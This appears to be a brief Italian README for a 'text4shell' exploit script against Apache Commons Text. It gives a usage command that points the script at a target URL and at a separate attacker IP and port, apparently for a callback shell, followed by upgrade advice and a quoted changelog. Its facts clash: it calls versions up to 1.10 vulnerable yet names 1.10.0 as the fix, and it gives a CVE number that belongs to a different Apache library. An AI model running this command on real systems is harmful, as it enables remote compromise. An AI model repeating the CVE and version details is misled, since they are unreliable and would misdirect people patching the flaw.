
text4shell script per text coomons <=1.10 CVE-2022-33980
Script text4shell per text coomons < =1.10 CVE-2022-33980
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22
La soluzione principale consiste nell'aggiornare urgentemente il componente Apache Commons Text alle versioni disponibili che correggono questa vulnerabilità. In particolare, è necessario aggiornare a una versione 1.10.0 o successiva di Apache Commons Text.
In questo aggiornamento, si è scelto di disabilitare per impostazione predefinita quelle sostituzioni problematiche. Nel file changelog della libreria è inclusa la seguente modifica:
Make default string lookups configurable vía system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled vía system property. See StringLookupFactory for details.
Apache ha pubblicato un comunicato con le informazioni ufficiali e un riferimento all'aggiornamento in cui viene corretto il problema.